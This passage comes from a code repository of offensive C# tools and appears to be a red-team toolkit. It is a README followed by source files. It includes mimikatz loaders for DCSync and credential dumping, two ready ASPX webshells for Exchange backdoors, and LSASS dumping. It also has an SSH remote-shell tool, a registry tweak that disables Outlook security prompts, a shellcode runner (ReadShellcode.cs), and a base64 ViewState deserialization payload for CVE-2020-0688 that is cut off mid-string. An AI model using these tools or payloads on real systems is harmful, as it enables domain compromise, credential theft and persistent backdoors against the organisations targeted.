92 | 93 | This code supports .NET 3.5 or later. 94 | 95 | Compile: 96 | 97 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs` 98 | 99 | or 100 | 101 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs` 102 | 103 | Usage: 104 | 105 | `DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit` 106 | 107 | `DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit` 108 | 109 | --- 110 | 111 | ### SharpMimikatz_x86.cs 112 | 113 | Reference:Casey Smith's PELoader.cs 114 | 115 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 116 | 117 | I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 118 | 119 | The source code supports .NET 4.0 or later. 120 | 121 | This code supports .NET 3.5 or later. 122 | 123 | This is a 32-bit version. 124 | 125 | Compile: 126 | 127 | `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs` 128 | 129 | or 130 | 131 | `C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs` 132 | 133 | Usage: 134 | 135 | `SharpMimikatz_x86.exe coffee exit` 136 | 137 | ### SharpMimikatz_x64.cs 138 | 139 | Reference:Casey Smith's PELoader.cs 140 | 141 | The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48). 142 | 143 | I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14). 144 | 145 | The source code supports .NET 4.0 or later. 146 | 147 | This code supports .NET 3.5 or later. 148 | 149 | This is a 64-bit version. 
150 | 151 | Compile: 152 | 153 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs` 154 | 155 | or 156 | 157 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs` 158 | 159 | Usage: 160 | 161 | `SharpMimikatz_x64.exe coffee exit` 162 | 163 | ### SharpPELoaderGenerater.cs 164 | 165 | Used to generate SharpPELoader.cs 166 | 167 | Modified by 3gstudent 168 | 169 | Reference:Casey Smith's PELoader.cs 170 | 171 | Usage: 172 | 173 | `SharpPELoaderGenerater.exe ` 174 | 175 | Eg. 176 | 177 | `SharpPELoaderGenerater.exe mimikatz.exe` 178 | 179 | SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code. 180 | 181 | More details: 182 | 183 | [《通过.NET实现内存加载PE文件》](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87.NET%E5%AE%9E%E7%8E%B0%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BDPE%E6%96%87%E4%BB%B6/) 184 | 185 | --- 186 | 187 | ### AddMachineAccountofDomain.cs 188 | 189 | Reference:https://github.com/pkb1s/SharpAllowedToAct 190 | 191 | This code is just part of SharpAllowedToAct. 192 | 193 | It can be used to add a Machine Account(User:testNew,Password:123456789). 194 | 195 | This code can be compiled by csc.exe or Visual Studio. 196 | 197 | Supports .NET 3.5 or later. 198 | 199 | Compile: 200 | 201 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll` 202 | 203 | or 204 | 205 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll` 206 | 207 | --- 208 | 209 | ### mapi_tool.cs 210 | 211 | Use MAPI to manage Outlook. 212 | 213 | This code can be compiled by csc.exe or Visual Studio. 214 | 215 | Supports .NET 3.5 or later. 
216 | 217 | Compile: 218 | 219 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll` 220 | 221 | or 222 | 223 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll` 224 | 225 | ``` 226 | Usage: 227 | mapi_tool.exe GetAllFolders 228 | mapi_tool.exe GetConfig 229 | mapi_tool.exe ListMail 230 | mapi_tool.exe ListUnreadMail 231 | Ex command: 232 | mapi_tool.exe GetConfigEx 233 | mapi_tool.exe GetContactsEx 234 | mapi_tool.exe GetGlobalAddressEx 235 | mapi_tool.exe ListMailEx 236 | mapi_tool.exe ListUnreadMailEx 237 | mapi_tool.exe SaveAttachment 238 | :Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail 239 | Note: 240 | When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt. 241 | You can modify the registry to turn off the Outlook security prompt. 242 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2 243 | ``` 244 | 245 | ### Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll 246 | 247 | Used for Outlook 2010. 248 | 249 | ### Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll 250 | 251 | Used for Outlook 2013. 252 | 253 | --- 254 | 255 | ### BrailleToASCII.cs 256 | 257 | Used to translate Braille Patterns to ASCII characters. 258 | 259 | Support:`1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$` 260 | 261 | This code can be compiled by csc.exe or Visual Studio. 262 | 263 | Supports .NET 3.5 or later. 264 | 265 | Compile: 266 | 267 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs` 268 | 269 | or 270 | 271 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs` 272 | 273 | --- 274 | 275 | ### SSLCertScan 276 | 277 | Used to scan a website's SSL certificate. 
278 | 279 | Reference:https://github.com/ryanries/SharpTLSScan 280 | 281 | This code can be compiled by csc.exe or Visual Studio. 282 | 283 | Supports .NET 3.5 or later. 284 | 285 | Compile: 286 | 287 | ``` 288 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs 289 | 290 | or 291 | 292 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs 293 | ``` 294 | 295 | --- 296 | 297 | ### SharpSSHCheck_SSH.NET.cs 298 | 299 | Used to check whether an SSH credential is valid (based on SSH.NET). 300 | 301 | Supports password and privatekeyfile. 302 | 303 | Reference:https://github.com/sshnet/SSH.NET 304 | 305 | Note: 306 | 307 | You need to reference Renci.SshNet.dll. 308 | 309 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 310 | 311 | Compile: 312 | 313 | ``` 314 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll 315 | ``` 316 | 317 | Usage: 318 | 319 | ``` 320 | SharpSSHCheck_SSH.NET.exe 321 | : 322 | - plaintext 323 | - keyfile 324 | ``` 325 | Eg: 326 | 327 | ``` 328 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor 329 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa 330 | ``` 331 | 332 | ### SharpSSHRunCmd_SSH.NET 333 | 334 | Remote command execution via SSH (based on SSH.NET). 335 | 336 | Supports password and privatekeyfile. 337 | 338 | Reference:https://github.com/sshnet/SSH.NET 339 | 340 | Note: 341 | 342 | You need to reference Renci.SshNet.dll. 
343 | 344 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 345 | 346 | Compile: 347 | 348 | ``` 349 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll 350 | ``` 351 | 352 | Usage: 353 | 354 | ``` 355 | SharpSSHRunCmd_SSH.NET.exe 356 | : 357 | - plaintext 358 | - keyfile 359 | If the last argument is shell, you will get an interactive shell. 360 | ``` 361 | 362 | Eg: 363 | 364 | ``` 365 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell 366 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps 367 | ``` 368 | 369 | --- 370 | 371 | ### ListUserMailbyLDAP 372 | 373 | Use to export all users' mail by LDAP. 374 | 375 | Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs 376 | 377 | Compile: 378 | 379 | ``` 380 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 381 | or 382 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 383 | ``` 384 | 385 | Usage: 386 | 387 | ``` 388 | ListUserMailbyLDAP 389 | ``` 390 | 391 | Eg: 392 | 393 | ``` 394 | ListUserMailbyLDAP.exe 192.168.1.1 test1 password1 395 | ``` 396 | 397 | 398 | ### List_passwordneverexpires_user_byLDAP 399 | 400 | Use to export all users with password_never_expires by LDAP. 
401 | 402 | 403 | Compile: 404 | 405 | ``` 406 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 407 | or 408 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 409 | ``` 410 | 411 | Usage: 412 | 413 | ``` 414 | List_passwordneverexpires_user_byLDAP 415 | ``` 416 | 417 | Eg: 418 | 419 | ``` 420 | List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1 421 | ``` 422 | 423 | ### Add_passwordneverexpires_user_byLDAP 424 | 425 | Use to set the selected user with password_never_expires by LDAP. 426 | 427 | Compile: 428 | 429 | ``` 430 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 431 | or 432 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 433 | ``` 434 | 435 | Usage: 436 | 437 | ``` 438 | Add_passwordneverexpires_user_byLDAP 439 | ``` 440 | Eg: 441 | 442 | ``` 443 | Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1 444 | ``` 445 | 446 | --- 447 | 448 | ### SqlClient.cs 449 | 450 | From:https://github.com/FortyNorthSecurity/SqlClient 451 | 452 | Use to query the MSSQL database. 453 | 454 | Compile: 455 | 456 | ``` 457 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs 458 | ``` 459 | 460 | or 461 | 462 | ``` 463 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs 464 | ``` 465 | 466 | --- 467 | 468 | ### SharpADFindDemo.cs 469 | 470 | Use to export the AD data by LDAP. 
471 | Complie: 472 | 473 | ``` 474 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 475 | or 476 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 477 | ``` 478 | 479 | Usage: 480 | 481 | ``` 482 | SharpADFindDemo 483 | 484 | command: 485 | - user 486 | - machine 487 | - group 488 | - ou 489 | - username 490 | - machinename 491 | - groupname 492 | - ouname 493 | 494 | ``` 495 | 496 | Note:The maxsize is 1000. 497 | 498 | Eg: 499 | 500 | ``` 501 | SharpADFindDemo.exe 192.168.1.1 test1 password1 user 502 | ``` 503 | 504 | 505 | --- 506 | 507 | ### SharpExchangeBackdoor.cs 508 | 509 | Python Version: [SharpExchangeBackdoor.py](https://github.com/3gstudent/Homework-of-Python/blob/master/SharpExchangeBackdoor.py) 510 | 511 | Use to send payload to the Exchange webshell backdoor. 512 | 513 | Support: 514 | 515 | - assemblyLoad 516 | - webshellWrite 517 | 518 | Usage: 519 | 520 | ``` 521 | 522 | mode: 523 | assemblyLoad 524 | webshellWrite 525 | ``` 526 | 527 | eg. 528 | 529 | ``` 530 | SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll 531 | SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx 532 | ``` 533 | 534 | assemblyLoad.aspx: 535 | 536 | ``` 537 | <%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%> 538 | ``` 539 | 540 | webshellWrite.aspx: 541 | 542 | ``` 543 | <%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%> 544 | ``` 545 | 546 | --- 547 | 548 | ## XamlToViewState.cs 549 | 550 | Use to create viewstate from XAML file 551 | 552 | Usage: 553 | 554 | ``` 555 | 556 | ``` 557 | eg. 
558 | 559 | ``` 560 | XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF 561 | ``` 562 | 563 | ## SerializeXamlToViewState.cs 564 | 565 | Use to create viewstate from Serialize Xaml data. 566 | 567 | ## SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs 568 | 569 | ## SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs 570 | 571 | ## SharpExchangeDeserializeShell-NoAuth-ghostfile.cs 572 | 573 | Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs 574 | 575 | Use to test the deserializing code execution of Exchange. 576 | From read and write permissions of Exchange files to deserializing code execution. 577 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 578 | ``:owa or ecp 579 | Usage: 580 | 581 | ``` 582 | 583 | ``` 584 | 585 | eg. 586 | 587 | ``` 588 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 589 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 590 | ``` 591 | 592 | --- 593 | 594 | ## SharpExchangeDumpHash.cs 595 | 596 | Use to send payload to the Exchange webshell backdoor. 597 | The communication is encrypted by AES. 598 | 599 | Support function: 600 | 601 | - generate : generate the webshell 602 | - dumplsass: save the dump file of LSASS to C:\\Windows\\Temp\\lsass.bin 603 | - parsedump: use mimikatz to load C:\\Windows\\Temp\\lsass.bin and save the results to C:\\Windows\\Temp\\mimikatz.log 604 | 605 | Usage: 606 | 607 | ``` 608 | 609 | ``` 610 | 611 | mode: 612 | 613 | - generate 614 | - dumplsass 615 | - parsedump 616 | 617 | eg. 
618 | 619 | ``` 620 | SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass 621 | SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump 622 | ``` 623 | 624 | --- 625 | 626 | ## SharpDCSync_krbtgt.cs 627 | 628 | Use DRSR protocol to ask a domain controller to get the krbtgt's hash. 629 | 630 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 631 | 632 | ## SharpDCSync.cs 633 | 634 | use DRSR protocol to ask a domain controller to synchronize a specified entry. 635 | 636 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 637 | 638 | --- 639 | 640 | ## SharpTGTImporter.cs 641 | 642 | Use to import the TGT 643 | 644 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 645 | 646 | --- 647 | ## SharpGetUserLoginIPRPC.cs 648 | 649 | Use RPC to get the login IP of domain users through the event log. 650 | 651 | Support local and remote access 652 | 653 | ## SharpGetUserLoginIPWMI.cs 654 | 655 | Use WMI to get the login IP of domain users through the event log. 
656 | 657 | Support local and remote access 658 | 659 | --- 660 | -------------------------------------------------------------------------------- /ReadShellcode.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace ReadShellcode 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | try 13 | { 14 | String Base64String = File.ReadAllText(@"ShellcodeBase64.txt"); 15 | byte[] shellcode64 = Convert.FromBase64String(Base64String); 16 | 17 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 18 | Marshal.Copy(shellcode64, 0, (IntPtr)(funcAddr), shellcode64.Length); 19 | IntPtr hThread = IntPtr.Zero; 20 | UInt32 threadId = 0; 21 | IntPtr pinfo = IntPtr.Zero; 22 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | catch (Exception ex) 26 | { 27 | Console.WriteLine(ex.Message); 28 | } 29 | 30 | } 31 | 32 | private static UInt32 MEM_COMMIT = 0x1000; 33 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 34 | [DllImport("kernel32")] 35 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 36 | [DllImport("kernel32")] 37 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 38 | [DllImport("kernel32")] 39 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 40 | 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /SSLCertScan.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Net.Security; 6 | using 
System.Net.Sockets; 7 | using System.Text.RegularExpressions; 8 | using System.Security.Cryptography; 9 | using System.Security.Cryptography.X509Certificates; 10 | 11 | namespace SSLCertScan 12 | { 13 | class Program 14 | { 15 | static void ShowUsage() 16 | { 17 | string Usage = @" 18 | SSLCertScan 19 | Use to scan the website SSL certificate. 20 | Modified by 3gstudent 21 | Reference:https://github.com/ryanries/SharpTLSScan 22 | 23 | Usage: 24 | SSLCertScan.exe 25 | Eg: 26 | SSLCertScan.exe 192.168.1.1 443 27 | "; 28 | Console.WriteLine(Usage); 29 | } 30 | static void Main(string[] args) 31 | { 32 | if (args.Length != 2) 33 | ShowUsage(); 34 | else 35 | { 36 | try 37 | { 38 | cpClient tcpClient = new TcpClient(args[0], Convert.ToInt32(args[1])); 39 | Console.WriteLine("[+] " + args[0] + " responds to TCP on " + args[1] + ".\n"); 40 | SslStream sslStream = new SslStream(tcpClient.GetStream(), true, CertificateValidationCallBack); 41 | sslStream.AuthenticateAsClient(args[0]); 42 | Console.WriteLine("SChannel negotiated the following:\n"); 43 | Console.WriteLine("Protocol Version : " + sslStream.SslProtocol); 44 | Console.WriteLine("Cipher Algorithm : " + sslStream.CipherAlgorithm); 45 | Console.WriteLine("Cipher Strength : " + sslStream.CipherStrength + " bits"); 46 | Console.WriteLine("Hash Algorithm : " + sslStream.HashAlgorithm); 47 | Console.WriteLine("Hash Strength : " + sslStream.HashStrength + " bits"); 48 | Console.Write("Key Exchange Algorithm: "); 49 | if (sslStream.KeyExchangeAlgorithm.ToString() == "44550") 50 | Console.WriteLine("ECDH Ephemeral"); 51 | else 52 | Console.WriteLine(sslStream.KeyExchangeAlgorithm); 53 | Console.WriteLine("Key Exchange Strength : " + sslStream.KeyExchangeStrength + " bits"); 54 | } 55 | catch (Exception ex) 56 | { 57 | Console.WriteLine("[!] 
" + ex.Message); 58 | return; 59 | } 60 | } 61 | 62 | } 63 | private static bool CertificateValidationCallBack(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) 64 | { 65 | // Certificate2 is better than Certificate1, right? 66 | X509Certificate2 cert = (X509Certificate2)certificate; 67 | 68 | string[] subjectPieces = splitDN(cert.Subject); 69 | 70 | Console.Write("Certificate Subject : "); 71 | for (int x = 0; x < subjectPieces.Length; x++) 72 | { 73 | if (x == 0) 74 | Console.WriteLine(subjectPieces[x]); 75 | else 76 | Console.WriteLine(" " + subjectPieces[x]); 77 | } 78 | 79 | string[] issuerPieces = splitDN(cert.Issuer); 80 | 81 | Console.Write("Certificate Issuer : "); 82 | for (int x = 0; x < issuerPieces.Length; x++) 83 | { 84 | if (x == 0) 85 | Console.WriteLine(issuerPieces[x]); 86 | else 87 | Console.WriteLine(" " + issuerPieces[x]); 88 | } 89 | 90 | Console.WriteLine("Certificate Begins : " + cert.NotBefore); 91 | Console.WriteLine("Certificate Expires : " + cert.NotAfter); 92 | Console.WriteLine("Certificate Version : " + cert.Version); 93 | if (cert.SignatureAlgorithm.FriendlyName.ToLower().Contains("md5")) 94 | { 95 | Console.WriteLine("Signature Algorithm : " + cert.SignatureAlgorithm.FriendlyName + " (" + cert.SignatureAlgorithm.Value + ")"); 96 | } 97 | else 98 | { 99 | Console.WriteLine("Signature Algorithm : " + cert.SignatureAlgorithm.FriendlyName + " (" + cert.SignatureAlgorithm.Value + ")"); 100 | } 101 | Console.WriteLine("Key Exchange Algorithm: " + cert.PublicKey.Key.KeyExchangeAlgorithm); 102 | Console.WriteLine("Public Key Algorithm : " + new System.Security.Cryptography.Oid(cert.GetKeyAlgorithm()).FriendlyName); 103 | Console.WriteLine("Public Key Size : " + cert.PublicKey.Key.KeySize); 104 | byte[] RSAkey = cert.GetPublicKey(); 105 | string strRSAkey = ""; 106 | for (int i = 0; i < RSAkey.Length; i++) 107 | { 108 | strRSAkey += RSAkey[i].ToString("X2"); 109 | } 110 | Console.WriteLine("Public 
Key : " + strRSAkey); 111 | 112 | foreach (X509Extension extension in cert.Extensions) 113 | { 114 | if (extension.Oid.FriendlyName == "Subject Alternative Name") 115 | { 116 | AsnEncodedData asnData = new AsnEncodedData(extension.Oid, extension.RawData); 117 | string[] sans = asnData.Format(false).Split(','); 118 | Console.Write("Alternative Names : "); 119 | for (int x = 0; x < sans.Length; x++) 120 | { 121 | if (x == 0) 122 | Console.WriteLine(sans[x]); 123 | else 124 | Console.WriteLine(" " + sans[x]); 125 | } 126 | } 127 | } 128 | Console.Write("Certificate Validated : "); 129 | if (sslPolicyErrors == SslPolicyErrors.None) 130 | { 131 | Console.WriteLine("Yes"); 132 | } 133 | else 134 | { 135 | Console.WriteLine("No (" + sslPolicyErrors + ")"); 136 | } 137 | return true; 138 | } 139 | 140 | private static string[] splitDN(string input) 141 | { 142 | string[] splitString = input.Split(','); 143 | List correctedSplitString = new List(); 144 | int index = 0; 145 | foreach (string part in splitString) 146 | { 147 | if (part.Contains('=')) 148 | { 149 | correctedSplitString.Add(part.Trim()); 150 | index++; 151 | } 152 | else 153 | { 154 | if (index > 0) 155 | correctedSplitString[index - 1] = correctedSplitString[index - 1] + ", " + part.Trim(); 156 | else 157 | correctedSplitString.Add(part.Trim()); 158 | index++; 159 | } 160 | } 161 | return correctedSplitString.ToArray(); 162 | } 163 | } 164 | 165 | } 166 | -------------------------------------------------------------------------------- /SerializeXamlToViewState.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Globalization; 6 | 7 | public static class SerializeXamlToViewState 8 | { 9 | public class Program 10 | { 11 | static byte[] strToHexByte(string hexString) 12 | { 13 | if ((hexString.Length % 2) != 0) 14 | hexString += " "; 15 | byte[] returnBytes = new 
byte[hexString.Length / 2]; 16 | for (int i = 0; i < returnBytes.Length; i++) 17 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 18 | return returnBytes; 19 | } 20 | static string CreateViewState(byte[] dat,string generator,string key) 21 | { 22 | MemoryStream ms = new MemoryStream(); 23 | byte[] validationKey= strToHexByte(key); 24 | 25 | uint _clientstateid = 0; 26 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 27 | { 28 | System.Environment.Exit(0); 29 | } 30 | 31 | byte[] _mackey = new byte[4]; 32 | _mackey[0] = (byte)_clientstateid; 33 | _mackey[1] = (byte)(_clientstateid >> 8); 34 | _mackey[2] = (byte)(_clientstateid >> 16); 35 | _mackey[3] = (byte)(_clientstateid >> 24); 36 | 37 | ms = new MemoryStream(); 38 | ms.Write(dat,0,dat.Length); 39 | ms.Write(_mackey,0,_mackey.Length); 40 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 41 | ms=new MemoryStream(); 42 | ms.Write(dat,0,dat.Length); 43 | ms.Write(hash,0,hash.Length); 44 | return Convert.ToBase64String(ms.ToArray()); 45 | } 46 | 47 | static void Main(string[] args) 48 | { 49 | string xaml_payload = 
"/wEyiF0AAQAAAP////8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy0AAAIAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg/AgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAAQAAACTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAITrY2AAAAAAAAAAAOAAAiELAQsAAAgAAAAGAAAAAAAAficAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACgnAABTAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAhAcAAAAgAAAACAA
